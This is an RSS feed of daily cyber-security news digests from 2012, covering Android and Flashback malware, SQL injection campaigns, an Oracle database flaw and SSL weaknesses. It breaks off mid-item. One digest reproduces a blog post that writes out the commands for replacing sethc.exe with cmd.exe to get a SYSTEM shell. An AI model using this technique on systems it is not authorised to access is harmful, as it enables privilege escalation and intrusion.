<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>IT Defense Solutions</title>
	<atom:link href="http://itdefensesolutions.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://itdefensesolutions.com</link>
	<description>Providing Security Solutions, News and Services</description>
	<lastBuildDate>Thu, 17 May 2012 13:30:21 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.2</generator>
		<item>
		<title>Cyber Security News &#8211;  May 17, 2012</title>
		<link>http://itdefensesolutions.com/2012/05/cyber-security-news-may-17-2012/</link>
		<comments>http://itdefensesolutions.com/2012/05/cyber-security-news-may-17-2012/#comments</comments>
		<pubDate>Thu, 17 May 2012 13:30:21 +0000</pubDate>
		<dc:creator>erwin@itdefensesolutions.com</dc:creator>
				<category><![CDATA[Security News]]></category>

		<guid isPermaLink="false">http://itdefensesolutions.com/2012/05/cyber-security-news-may-17-2012/</guid>
		<description><![CDATA[Staggering Increase in Android Malware Variants, Trojan Apps The number of malicious programs that target Google&#039;s Android mobile platform is growing at an alarming rate, according to data from anti-malware company F-Secure.  The number of malicious programs that target Google&#8217;s Android mobile platform is growing at an alarming rate, according to data from anti-malware company F-Secure.  [...]]]></description>
			<content:encoded><![CDATA[<ul class="scrd_digest">
<li><a href="http://threatpost.com/en_us/blogs/staggering-increase-android-malware-variants-trojan-apps-051612" rel="external">Staggering Increase in Android Malware Variants, Trojan Apps</a>
<div>
<p>The number of malicious programs that target Google&#039;s Android mobile platform is growing at an alarming rate, according to data from anti-malware company F-Secure. </p>
<div>
<div>
<div>
<p><span>The number of malicious programs that target Google&#8217;s Android mobile platform is growing at an alarming rate, according to data from anti-</span><span>malware</span><span> company F-Secure. </span></p>
</p></div>
</p></div>
</div>
<p><a href="http://threatpost.com/en_us/blogs/staggering-increase-android-malware-variants-trojan-apps-051612">read more</a></p>
</div>
</li>
</ul>
<p class="scrd_credit">Digest powered by <a href="http://www.rssdigestpro.com">RSS Digest</a></p>
]]></content:encoded>
			<wfw:commentRss>http://itdefensesolutions.com/2012/05/cyber-security-news-may-17-2012/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cyber Security News &#8211;  May 13, 2012</title>
		<link>http://itdefensesolutions.com/2012/05/cyber-security-news-may-13-2012/</link>
		<comments>http://itdefensesolutions.com/2012/05/cyber-security-news-may-13-2012/#comments</comments>
		<pubDate>Sun, 13 May 2012 14:12:24 +0000</pubDate>
		<dc:creator>erwin@itdefensesolutions.com</dc:creator>
				<category><![CDATA[Security News]]></category>

		<guid isPermaLink="false">http://itdefensesolutions.com/2012/05/cyber-security-news-may-13-2012/</guid>
		<description><![CDATA[iPhone, iPad Popularity Could Threaten Enterprise Security: Zscaler The security research firm found that Apple iOS traffic on the Web is growing, which will most likely draw more hacker interest to the mobile devices. &#8211; Apple devices from iPhones to iPads to Macs are becoming more prominent in enterprises as employees bring them to work, [...]]]></description>
			<content:encoded><![CDATA[<ul class="scrd_digest">
<li><a href="http://www.eweek.com/c/a/Security/iPhone-iPad-Popularity-Could-Threaten-Enterprise-Security-Zscaler-264268/?kc=rss" rel="external">iPhone, iPad Popularity Could Threaten Enterprise Security: Zscaler</a>
<div>The security research firm found that Apple iOS traffic on the Web is growing, which will most likely draw more hacker interest to the mobile devices.   &#8211;  Apple devices from iPhones to iPads to Macs are becoming more prominent in enterprises as employees bring them to work, fueling the burgeoning trend of the consumerization of IT.<br />
And that could cause security problems for businesses, according to researchers at security software maker Zscaler.<br />
The&#8230;</div>
</li>
</ul>
<p class="scrd_credit">Digest powered by <a href="http://www.rssdigestpro.com">RSS Digest</a></p>
]]></content:encoded>
			<wfw:commentRss>http://itdefensesolutions.com/2012/05/cyber-security-news-may-13-2012/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cyber Security News &#8211;  May 10, 2012</title>
		<link>http://itdefensesolutions.com/2012/05/cyber-security-news-may-10-2012/</link>
		<comments>http://itdefensesolutions.com/2012/05/cyber-security-news-may-10-2012/#comments</comments>
		<pubDate>Thu, 10 May 2012 13:41:42 +0000</pubDate>
		<dc:creator>erwin@itdefensesolutions.com</dc:creator>
				<category><![CDATA[Security News]]></category>

		<guid isPermaLink="false">http://itdefensesolutions.com/2012/05/cyber-security-news-may-10-2012/</guid>
		<description><![CDATA[Apple patches Safari, blocks outdated Flash Player Apple on Wednesday patched four security vulnerabilities in Safari and blocked outdated versions of Adobe&#8217;s Flash Player from running in its browser. Cybercriminals targeting users on Tumblr and Pinterest Online crooks are moving beyond just Facebook and Twitter to try to trick users into downloading malicious payloads. Digest [...]]]></description>
			<content:encoded><![CDATA[<ul class="scrd_digest">
<li><a href="http://rss.computerworld.com/~r/computerworld/news/feed/~3/eF5iZdxRzYk/Apple_patches_Safari_blocks_outdated_Flash_Player" rel="external">Apple patches Safari, blocks outdated Flash Player</a>
<div>Apple on Wednesday patched four security vulnerabilities in Safari and blocked outdated versions of Adobe&#8217;s Flash Player from running in its browser.<img src="http://feeds.feedburner.com/~r/computerworld/news/feed/~4/eF5iZdxRzYk" height="1" width="1" /></div>
</li>
<li><a href="http://news.cnet.com/8301-1009_3-57430681-83/cybercriminals-targeting-users-on-tumblr-and-pinterest/?part=rss&amp;tag=feed&amp;subj=News-Security&amp;Privacy" rel="external">Cybercriminals targeting users on Tumblr and Pinterest</a>
<div>Online crooks are moving beyond just Facebook and Twitter to try to trick users into downloading malicious payloads.</div>
</li>
</ul>
<p class="scrd_credit">Digest powered by <a href="http://www.rssdigestpro.com">RSS Digest</a></p>
]]></content:encoded>
			<wfw:commentRss>http://itdefensesolutions.com/2012/05/cyber-security-news-may-10-2012/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cyber Security News &#8211;  May 4, 2012</title>
		<link>http://itdefensesolutions.com/2012/05/cyber-security-news-may-4-2012/</link>
		<comments>http://itdefensesolutions.com/2012/05/cyber-security-news-may-4-2012/#comments</comments>
		<pubDate>Fri, 04 May 2012 13:33:39 +0000</pubDate>
		<dc:creator>erwin@itdefensesolutions.com</dc:creator>
				<category><![CDATA[Security News]]></category>

		<guid isPermaLink="false">http://itdefensesolutions.com/2012/05/cyber-security-news-may-4-2012/</guid>
		<description><![CDATA[Yet Another SQL Injection Attack Somehow these SQL Injections targetting ASP/ASP.net sites just never seem to abate. First there was Lizamoon&#8230; Surprising us with the millions of websites that got injected. Then came a few others with the recent ones being nikjju.com and hgbyju.com. Now came njukol… Although the name is no longer as catchy [...]]]></description>
			<content:encoded><![CDATA[<ul class="scrd_digest">
<li><a href="http://www.f-secure.com/weblog/archives/00002357.html" rel="external">Yet Another SQL Injection Attack</a>
<div>Somehow these SQL Injections targetting ASP/ASP.net sites just never seem to abate.</p>
<p>First there was <a href="http://community.websense.com/blogs/securitylabs/archive/2011/03/29/lizamoon-mass-injection-28000-urls-including-itunes.aspx">Lizamoon</a>&#8230; Surprising us with the millions of websites that got injected.</p>
<p>Then came a few others with the recent ones being <a href="http://blog.sucuri.net/2012/04/nikjju-mass-injection-campaign-150k-sites-compromised.html">nikjju.com</a> and <a href="http://blog.sucuri.net/2012/04/nikjju-sql-injection-update-now-hgbyju-comr-php.html">hgbyju.com</a>.</p>
<p>Now came njukol…</p>
<p><img border="0" src="http://www.f-secure.com/weblog/archives/google_results.png" alt="google_results (256k image)" height="732" width="492" /></p>
<p>Although the name is no longer as catchy as Lizamoon, the idea remains the same.</p>
<p>This njukol.com is still pretty fresh out of the oven. The domain was registered last April 28. The funny thing is, the registrant of the domain is still the same with all those previous ones.</p>
<p><img border="0" src="http://www.f-secure.com/weblog/archives/registrant.png" alt="registrant (6k image)" height="150" width="355" />
<p>On 03/05/12 At 04:31 PM</p>
</div>
</li>
<li><a href="http://feedproxy.google.com/~r/nakedsecurity/~3/g4Wksoe_Xzo/" rel="external">Belgian bank blackmailed by hackers threatening to expose customer data</a>
<div>Hackers break into a Belgian bank, steal confidential customer information, and then blackmail the bank: pay us or we expose your customers&#8217; confidential data. Who is the real victim here? <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=nakedsecurity.sophos.com&amp;blog=15254721&amp;post=163612&amp;subd=sophosnews&amp;ref=&amp;feed=1" width="1" height="1" /><img src="http://feeds.feedburner.com/~r/nakedsecurity/~4/g4Wksoe_Xzo" height="1" width="1" /></div>
</li>
<li><a href="http://www.networkworld.com/news/2012/050312-cybersecurity-tips-258931.html?source=nww_rss" rel="external">How to land a cybersecurity job</a>
<div>Cybersecurity jobs are plentiful, from government, financial services and utilities to manufacturing and retail. But what skills do IT professionals need to qualify for these high-paying jobs?</div>
</li>
</ul>
<p class="scrd_credit">Digest powered by <a href="http://www.rssdigestpro.com">RSS Digest</a></p>
]]></content:encoded>
			<wfw:commentRss>http://itdefensesolutions.com/2012/05/cyber-security-news-may-4-2012/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cyber Security News &#8211;  May 2, 2012</title>
		<link>http://itdefensesolutions.com/2012/05/cyber-security-news-may-2-2012/</link>
		<comments>http://itdefensesolutions.com/2012/05/cyber-security-news-may-2-2012/#comments</comments>
		<pubDate>Wed, 02 May 2012 14:06:34 +0000</pubDate>
		<dc:creator>erwin@itdefensesolutions.com</dc:creator>
				<category><![CDATA[Security News]]></category>

		<guid isPermaLink="false">http://itdefensesolutions.com/2012/05/cyber-security-news-may-2-2012/</guid>
		<description><![CDATA[Skype IP Address Vulnerability May Not Be So New A vulnerability in Skype that could expose members&#039; IP addresses may have been known to Skype officials as far back as November 2010. A researcher who first discovered the flaw speculates it may have been left exposed perhaps because it was deeply embedded in the code and [...]]]></description>
			<content:encoded><![CDATA[<ul class="scrd_digest">
<li><a href="http://threatpost.com/en_us/blogs/skype-ip-snooping-vulnerability-may-not-be-so-new-050112" rel="external">Skype IP Address Vulnerability May Not Be So New</a>
<div>
<p>A vulnerability in Skype that could expose members&#039; IP addresses may have been known to Skype officials as far back as November 2010. A researcher who first discovered the flaw speculates it may have been left exposed perhaps because it was deeply embedded in the code and could cause other problems, according to a <a href="http://blogs.wsj.com/cio/2012/05/01/skype-knew-of-security-flaw-since-november-2010-researchers-say/">Wall Street Journal blog</a>.</p>
<p><a href="http://threatpost.com/en_us/blogs/skype-ip-snooping-vulnerability-may-not-be-so-new-050112">read more</a></p>
</div>
</li>
<li><a href="http://feeds.ziffdavisenterprise.com/~r/RSS/eweeksecurity/~3/XZb9hBW4_kc/" rel="external">Mac Flashback Attackers Made $10,000 a Day: Symantec</a>
<div>The cyber-criminals behind the botnet stole ad revenue from Google by redirecting clicks from infected Apple Mac systems, according to Symantec researchers.   &#8211;  The cyber-criminals running the notorious Mac Flashback malware were bringing in as much as $10,000 a day during the height of the botnet&#8217;s activity, according to security software vendor Symantec.<br />
The attackers behind the Flashback malware which at one point had infected as many as 700,000 Apple M&#8230;</p>
<p><a href="http://ads.pheedo.com/click.phdo?s=83927c5cd78ce698e57666096a18baad&amp;p=1"><img alt="" border="0" src="http://ads.pheedo.com/img.phdo?s=83927c5cd78ce698e57666096a18baad&amp;p=1" /></a><br />
<img alt="" height="0" width="0" border="0" src="http://tags.bluekai.com/site/5148" /><img alt="" height="0" width="0" border="0" src="http://insight.adsrvr.org/track/evnt/?ct=0:8pyu3gz&amp;adv=wouzn4v&amp;fmt=3" />
</p>
<div>
<a href="http://feeds.ziffdavisenterprise.com/~ff/RSS/eweeksecurity?a=XZb9hBW4_kc:kGLjT__HMyw:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/RSS/eweeksecurity?d=yIl2AUoC8zA" border="0" /></a> <a href="http://feeds.ziffdavisenterprise.com/~ff/RSS/eweeksecurity?a=XZb9hBW4_kc:kGLjT__HMyw:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/RSS/eweeksecurity?i=XZb9hBW4_kc:kGLjT__HMyw:V_sGLiPBpWU" border="0" /></a> <a href="http://feeds.ziffdavisenterprise.com/~ff/RSS/eweeksecurity?a=XZb9hBW4_kc:kGLjT__HMyw:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/RSS/eweeksecurity?d=7Q72WNTAKBA" border="0" /></a> <a href="http://feeds.ziffdavisenterprise.com/~ff/RSS/eweeksecurity?a=XZb9hBW4_kc:kGLjT__HMyw:dnMXMwOfBR0"><img src="http://feeds.feedburner.com/~ff/RSS/eweeksecurity?d=dnMXMwOfBR0" border="0" /></a>
</div>
<p><img src="http://feeds.feedburner.com/~r/RSS/eweeksecurity/~4/XZb9hBW4_kc" height="1" width="1" /></div>
</li>
</ul>
<p class="scrd_credit">Digest powered by <a href="http://www.rssdigestpro.com">RSS Digest</a></p>
]]></content:encoded>
			<wfw:commentRss>http://itdefensesolutions.com/2012/05/cyber-security-news-may-2-2012/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cyber Security News &#8211;  May 1, 2012</title>
		<link>http://itdefensesolutions.com/2012/05/cyber-security-news-may-1-2012/</link>
		<comments>http://itdefensesolutions.com/2012/05/cyber-security-news-may-1-2012/#comments</comments>
		<pubDate>Tue, 01 May 2012 13:43:29 +0000</pubDate>
		<dc:creator>erwin@itdefensesolutions.com</dc:creator>
				<category><![CDATA[Security News]]></category>

		<guid isPermaLink="false">http://itdefensesolutions.com/2012/05/cyber-security-news-may-1-2012/</guid>
		<description><![CDATA[Release of exploit code puts Oracle Database users at risk of attack Oracle has declined to patch a critical vulnerability in its flagship database product, leaving customers vulnerable to attacks that siphon confidential information from corporate servers and execute malware on backend systems, a security researcher said. Virtually all versions of the Oracle Database Server [...]]]></description>
			<content:encoded><![CDATA[<ul class="scrd_digest">
<li><a href="http://feeds.arstechnica.com/~r/arstechnica/everything/~3/JmZFl57Rn9o/release-of-exploit-code-puts-oracle-database-users-at-risk-of-attack.ars" rel="external">Release of exploit code puts Oracle Database users at risk of attack</a>
<div>
<p>  <a href="http://arstechnica.com/business/news/2012/04/release-of-exploit-code-puts-oracle-database-users-at-risk-of-attack.ars?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=rss"><br />
	  <img vspace="4" hspace="4" border="0" width="593" height="277" src="http://static.arstechnica.net/2012/04/30/oracle_database_vulnerability-4f9eede-intro.png" /><br />
	  </a>
  </p>
<p>Oracle has declined to patch a critical vulnerability in its flagship database product, leaving customers vulnerable to attacks that siphon confidential information from corporate servers and execute malware on backend systems, a security researcher said.</p>
<p>Virtually all versions of the Oracle Database Server released in the past 13 years contain a bug that allows hackers to perform man-in-the-middle attacks that monitor all data passing between the server and end users who are connected to it. That&#8217;s what Joxean Koret, a security researcher based in Spain, told Ars. The &#8220;Oracle TNS Poison&#8221; vulnerability, as he has dubbed it, resides in the Transparent Network Substrate Listener, which routes connections between clients and the database server. Koret said Oracle learned of the bug in 2008 and indicated in a recent e-mail that it had no plans to fix current supported versions of the enterprise product because of concerns it could cause &#8220;regressions&#8221; in the code base.</p>
<p><a href="http://arstechnica.com/business/news/2012/04/release-of-exploit-code-puts-oracle-database-users-at-risk-of-attack.ars?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=rss" title="Click here to continue reading this article"><img src="http://static.arstechnica.net/mt-static/plugins/ArsTheme/images/read-more.jpg" alt="Read the rest of this article..." /></a></p>
<p><a href="http://arstechnica.com/business/news/2012/04/release-of-exploit-code-puts-oracle-database-users-at-risk-of-attack.ars?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=rss&amp;comments=1#comments-bar">Read the comments on this post</a></p>
</p>
<p><img src="http://feeds.feedburner.com/~r/arstechnica/everything/~4/JmZFl57Rn9o" height="1" width="1" /></div>
</li>
<li><a href="http://carnal0wnage.attackresearch.com/2012/04/privilege-escalation-via-sticky-keys.html" rel="external">Privilege Escalation via &quot;Sticky&quot; Keys</a>
<div>This has been documented all over, but i like things to be on the blog so i can find them&#8230;</p>
<p>You can gain a SYSTEM shell on an application you have administrative access on  or if you have physical access to the box and can boot to repair disk or linux distro and can change files.</p>
<p>make a copy somewhere of the original on system sethc.exe</p>
<p><span>copy c:\windows\system32\sethc.exe c:\</span><br /><span><br /></span><br /><span>cp /mnt/sda3/Windows/System32/sethc.exe </span><span>/mnt/sda3/sethc.exe</span><br /><span><br /></span><br /><span>copy cmd.exe into sethc.exe&#8217;s place</span><br /><span><br /></span><br /><span>copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe</span><br /><span><br /></span><br /><span>or</span><br /><span><br /></span><br /><span>cp /mnt/sda3/Windows/System32/cmd.exe </span><span>/mnt/sda3/Windows/System32/sethc.exe</span><br /><span><br /></span><br /><span>Reboot, hit Shift key 5 times, SYSTEM shell will pop up, do your thing</span><br /><span><br /></span>
<div><a href="http://1.bp.blogspot.com/-gvOOvXsWTEI/T5rEC4yQMcI/AAAAAAAAAzI/xyfhIKgqbB4/s1600/forgot.administrator.password.sethc_thumb.png"><img border="0" height="224" src="http://1.bp.blogspot.com/-gvOOvXsWTEI/T5rEC4yQMcI/AAAAAAAAAzI/xyfhIKgqbB4/s320/forgot.administrator.password.sethc_thumb.png" width="320" /></a></div>
<p><b><br /></b>
<div></div>
<p><b><br /></b><br />it would probably be nice to sethc.exe back when you are done.
<div><img width="1" height="1" src="https://blogger.googleusercontent.com/tracker/8539880144347728238-1672858696533884669?l=carnal0wnage.attackresearch.com" alt="" /></div>
</div>
</li>
</ul>
<p class="scrd_credit">Digest powered by <a href="http://www.rssdigestpro.com">RSS Digest</a></p>
]]></content:encoded>
			<wfw:commentRss>http://itdefensesolutions.com/2012/05/cyber-security-news-may-1-2012/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cyber Security News &#8211;  April 27, 2012</title>
		<link>http://itdefensesolutions.com/2012/04/cyber-security-news-april-27-2012/</link>
		<comments>http://itdefensesolutions.com/2012/04/cyber-security-news-april-27-2012/#comments</comments>
		<pubDate>Fri, 27 Apr 2012 13:41:02 +0000</pubDate>
		<dc:creator>erwin@itdefensesolutions.com</dc:creator>
				<category><![CDATA[Security News]]></category>

		<guid isPermaLink="false">http://itdefensesolutions.com/2012/04/cyber-security-news-april-27-2012/</guid>
		<description><![CDATA[90% of popular SSL sites vulnerable to exploits, researchers find Less than 10 percent of the most popular websites offering Secure Socket Layer protection are hardened against known attacks that could allow hackers to decrypt or tamper with encrypted traffic, researchers said Thursday. The grim figure was generated by SSL Pulse, a website that monitors [...]]]></description>
			<content:encoded><![CDATA[<ul class="scrd_digest">
<li><a href="http://feeds.arstechnica.com/~r/arstechnica/everything/~3/9qhwF2AUN-0/90-of-popular-ssl-sites-vulnerable-to-exploits-researchers-find.ars" rel="external">90% of popular SSL sites vulnerable to exploits, researchers find</a>
<div>
<p>  <a href="http://arstechnica.com/business/news/2012/04/90-of-popular-ssl-sites-vulnerable-to-exploits-researchers-find.ars?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=rss"><br />
	  <img vspace="4" hspace="4" border="0" width="640" height="338" src="http://static.arstechnica.net/assets/2012/04/ssl_pulse-4f999df-intro-thumb-640xauto-33386.png" /><br />
	  </a>
  </p>
<p>Less than 10 percent of the most popular websites offering Secure Socket Layer protection are hardened against known attacks that could allow hackers to decrypt or tamper with encrypted traffic, researchers said Thursday.</p>
<p>The grim figure was generated by <a href="https://www.trustworthyinternet.org/ssl-pulse/">SSL Pulse</a>, a website that monitors the effectiveness of the 200,000 most popular websites that use SSL, also known as Transport Layer Security, to protect e-mail and other sensitive data from being snooped on while in transit. The product of a group of SSL experts from Google, Twitter, PayPal, Qualys and other firms, SSL Pulse systematically scans all subdomains of the top-ranked sites as measured by <a href="http://www.alexa.com/topsites/global;0">Alexa</a> for pages that use the protocol to prevent man-in-the-middle eavesdropping. By examining the top 200,000 SSL-enabled sites, the researchers aim to give a snapshot of the overall health of SSL protection, which is offered by an estimated 1.5 million sites in total.</p>
<p><a href="http://arstechnica.com/business/news/2012/04/90-of-popular-ssl-sites-vulnerable-to-exploits-researchers-find.ars?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=rss" title="Click here to continue reading this article"><img src="http://static.arstechnica.net/mt-static/plugins/ArsTheme/images/read-more.jpg" alt="Read the rest of this article..." /></a></p>
<p><a href="http://arstechnica.com/business/news/2012/04/90-of-popular-ssl-sites-vulnerable-to-exploits-researchers-find.ars?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=rss&amp;comments=1#comments-bar">Read the comments on this post</a></p>
</p>
<p><img src="http://feeds.feedburner.com/~r/arstechnica/everything/~4/9qhwF2AUN-0" height="1" width="1" /></div>
</li>
</ul>
<p class="scrd_credit">Digest powered by <a href="http://www.rssdigestpro.com">RSS Digest</a></p>
]]></content:encoded>
			<wfw:commentRss>http://itdefensesolutions.com/2012/04/cyber-security-news-april-27-2012/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cyber Security News &#8211;  April 25, 2012</title>
		<link>http://itdefensesolutions.com/2012/04/cyber-security-news-april-25-2012/</link>
		<comments>http://itdefensesolutions.com/2012/04/cyber-security-news-april-25-2012/#comments</comments>
		<pubDate>Wed, 25 Apr 2012 13:41:12 +0000</pubDate>
		<dc:creator>erwin@itdefensesolutions.com</dc:creator>
				<category><![CDATA[Security News]]></category>

		<guid isPermaLink="false">http://itdefensesolutions.com/2012/04/cyber-security-news-april-25-2012/</guid>
		<description><![CDATA[New, sneakier Flashback malware infects Macs A new, sneakier variant of the Flashback malware has been uncovered by the French security firm Intego. Digest powered by RSS Digest]]></description>
			<content:encoded><![CDATA[<ul class="scrd_digest">
<li><a href="http://rss.computerworld.com/~r/computerworld/s/feed/topic/17/~3/ZFvSPY-rwk4/New_sneakier_Flashback_malware_infects_Macs" rel="external">New, sneakier Flashback malware infects Macs</a>
<div>A new, sneakier variant of the Flashback malware has been uncovered by the French security firm Intego.<img src="http://feeds.feedburner.com/~r/computerworld/s/feed/topic/17/~4/ZFvSPY-rwk4" height="1" width="1" /></div>
</li>
</ul>
<p class="scrd_credit">Digest powered by <a href="http://www.rssdigestpro.com">RSS Digest</a></p>
]]></content:encoded>
			<wfw:commentRss>http://itdefensesolutions.com/2012/04/cyber-security-news-april-25-2012/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cyber Security News &#8211;  April 24, 2012</title>
		<link>http://itdefensesolutions.com/2012/04/cyber-security-news-april-24-2012/</link>
		<comments>http://itdefensesolutions.com/2012/04/cyber-security-news-april-24-2012/#comments</comments>
		<pubDate>Tue, 24 Apr 2012 13:49:37 +0000</pubDate>
		<dc:creator>erwin@itdefensesolutions.com</dc:creator>
				<category><![CDATA[Security News]]></category>

		<guid isPermaLink="false">http://itdefensesolutions.com/2012/04/cyber-security-news-april-24-2012/</guid>
		<description><![CDATA[New Flashback variant making the rounds Flashback.S installs itself without a password and then deletes files and folders to mask its presence, a security company announces. Both Mac and Windows are Targeted at Once Symantec Security Response, along with some other security vendors, reported the discovery of the OSX.Flashback malware recently patched by Apple. Many [...]]]></description>
			<content:encoded><![CDATA[<ul class="scrd_digest">
<li><a href="http://news.cnet.com/8301-1009_3-57419603-83/new-flashback-variant-making-the-rounds/?part=rss&amp;tag=feed&amp;subj=News-Security&amp;Privacy" rel="external">New Flashback variant making the rounds</a>
<div>Flashback.S installs itself without a password and then deletes files and folders to mask its presence, a security company announces.</div>
</li>
<li><a href="http://www.symantec.com/connect/blogs/both-mac-and-windows-are-targeted-once" rel="external">Both Mac and Windows are Targeted at Once</a>
<div>
<p>Symantec Security Response, along with some other security vendors, reported the discovery of the <a href="http://www.symantec.com/security_response/writeup.jsp?docid=2011-093016-1216-99">OSX.Flashback</a> malware recently patched by Apple. Many people may be surprised to learn the infection volume is reported at over 600,000 computers.</p>
<p>On a new front, we have recently identified new Java Applet malware, which uses the <a href="http://www.securityfocus.com/bid/52161">Oracle Java SE Remote Java Runtime Environment Code Execution Vulnerability</a> (CVE-2012-0507) to download its payload. This attack vector is the same as the older one, but in this case the Java Applet checks which OS it is running on and downloads a suitable malware for the OS. This is explained further in the following illustration:<br />
	 </p>
<p><img alt="" src="http://www.symantec.com/connect/imagebrowser/view/image/2223021/_original" /><br />
	 </p>
<p>When a victim loads the Java Applet malware, it breaks the Java Applet sandbox by using the CVE-2012-0507 vulnerability. This vulnerability is effective for both Mac and Windows operating systems. Then, if the threat is running on a Mac operating system, it downloads a dropper type malware written in Python. However, if the threat is running on a Windows operating system, it downloads a standard Windows executable file dropper. Both droppers drop a Trojan horse program that opens a back door on the compromised computer.</p>
<p>The following Java code illustrates how the Java Applet malware checks which OS it is running on, downloads the dropper, and executes it:<br />
	 </p>
<p><img alt="" src="http://www.symantec.com/connect/imagebrowser/view/image/2223031/article%20thumbnail" /><br />
	 </p>
<p>The Trojan only checks whether it is a Windows operating system or not in this code, but the downloaded Python dropper checks again whether it is a Mac operating system or not. If it is running on Linux or some other operating system, the threat does nothing. Python is not a popular script to write malware in, but it works fine on a Mac operating system because Python has already been installed by default.</p>
<p>Finally, one of two back door Trojans is dropped on to the computer. These two Trojans are downloaded from the same server, but are a little bit different from each other.</p>
<p>The back door Trojan for the Mac operating system written in Python can control the “polling times”, which is related to how many times it gets commands from the server at certain time intervals. The author has done this in order to avoid IDS or IPS detection by reducing network communication. The network connection is also encrypted by RC4 or compressed by Zlib.</p>
<p>Currently, the main function is only to get a Python script and execute it. The threat also has the following functions, but these are currently disabled:</p>
<ul>
<li>Download files</li>
<li>List files and folders</li>
<li>Open a remote shell</li>
<li>Sleep</li>
<li>Upload files</li>
</ul>
<p>On the other hand, the back door Trojan for the Windows operating system is written in C++. This Trojan sends the following information back to the remote attacker:</p>
<ul>
<li>CPU details</li>
<li>Disk details</li>
<li>Memory usage</li>
<li>OS version</li>
<li>User name</li>
</ul>
<p>The Trojan may also download a file and execute it, or open a shell to receive commands.</p>
<p>Recently, malware that targets Mac computers, such as <a href="http://www.symantec.com/security_response/writeup.jsp?docid=2011-093016-1216-99">OSX.Flashback</a> and <a href="http://www.symantec.com/security_response/writeup.jsp?docid=2012-041310-1536-99">OSX.Sabpab</a>, are increasing. This recent increase provides evidence that malware authors now consider Mac computers a viable battleground along with the Windows platform. Certainly it is now time for you to arm your Mac computer with a good security product.</p>
<p>Symantec detects the Java Applet malware as <a href="http://www.symantec.com/security_response/writeup.jsp?docid=2010-102003-2856-99">Trojan.Maljava</a>, the droppers as <a href="http://www.symantec.com/security_response/writeup.jsp?docid=2002-082718-3007-99">Trojan.Dropper</a>, and the back door Trojans as <a href="http://www.symantec.com/security_response/writeup.jsp?docid=2001-062614-1754-99">Backdoor.Trojan</a>. We continue to watch out for both Mac and Windows malware in order to protect our customers.</p>
<p>To stay safe, please ensure that you have the latest patches installed on your system and keep your antivirus definitions up to date.</p>
<div></div>
</div>
</li>
</ul>
<p class="scrd_credit">Digest powered by <a href="http://www.rssdigestpro.com">RSS Digest</a></p>
]]></content:encoded>
			<wfw:commentRss>http://itdefensesolutions.com/2012/04/cyber-security-news-april-24-2012/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cyber Security News &#8211;  April 22, 2012</title>
		<link>http://itdefensesolutions.com/2012/04/cyber-security-news-april-22-2012/</link>
		<comments>http://itdefensesolutions.com/2012/04/cyber-security-news-april-22-2012/#comments</comments>
		<pubDate>Sun, 22 Apr 2012 13:46:06 +0000</pubDate>
		<dc:creator>erwin@itdefensesolutions.com</dc:creator>
				<category><![CDATA[Security News]]></category>

		<guid isPermaLink="false">http://itdefensesolutions.com/2012/04/cyber-security-news-april-22-2012/</guid>
		<description><![CDATA[Mac Flashback Attack Started With Compromised WordPress Blogs Apple Mac users who visited the hijacked WordPress sites were infected by the malware, which morphed from a Trojan horse to a drive-by exploit, Kaspersky researchers said. &#8211; The Flashback malware that eventually infected more than 600,000 Macs worldwide probably started from tens of thousands of WordPress [...]]]></description>
			<content:encoded><![CDATA[<ul class="scrd_digest">
<li><a href="http://www.eweek.com/c/a/Security/Mac-Flashback-Attack-Started-With-Compromised-WordPress-Blogs-345275/?kc=rss" rel="external">Mac Flashback Attack Started With Compromised WordPress Blogs</a>
<div>Apple Mac users who visited the hijacked WordPress sites were infected by the malware, which morphed from a Trojan horse to a drive-by exploit, Kaspersky researchers said.   &#8211;  The Flashback malware that eventually infected more than 600,000 Macs worldwide probably started from tens of thousands of WordPress blog sites that had been hacked into and compromised, according to researchers at Kaspersky Lab.<br />
In March, the malware creators changed the way they wanted the Flashb&#8230;</div>
</li>
<li><a href="http://news.hitb.org/content/it-departments-should-worry-about-google-drive" rel="external">IT departments should worry about Google Drive</a>
<div>
<div>
<div>
<div><a href="http://news.hitb.org/content/it-departments-should-worry-about-google-drive"><img src="http://news.hitb.org/sites/default/files/styles/medium/public/field/image/google_drive_01-520x245.jpg" width="220" height="104" alt="http://cdn.thenextweb.com/wp-content/blogs.dir/1/files/2012/04/google_drive_01-5" /></a></div>
</div>
</div>
<div>
<div>
<div>
<p>Google Drive is poised to give IT departments yet another headache to deal with.  </p>
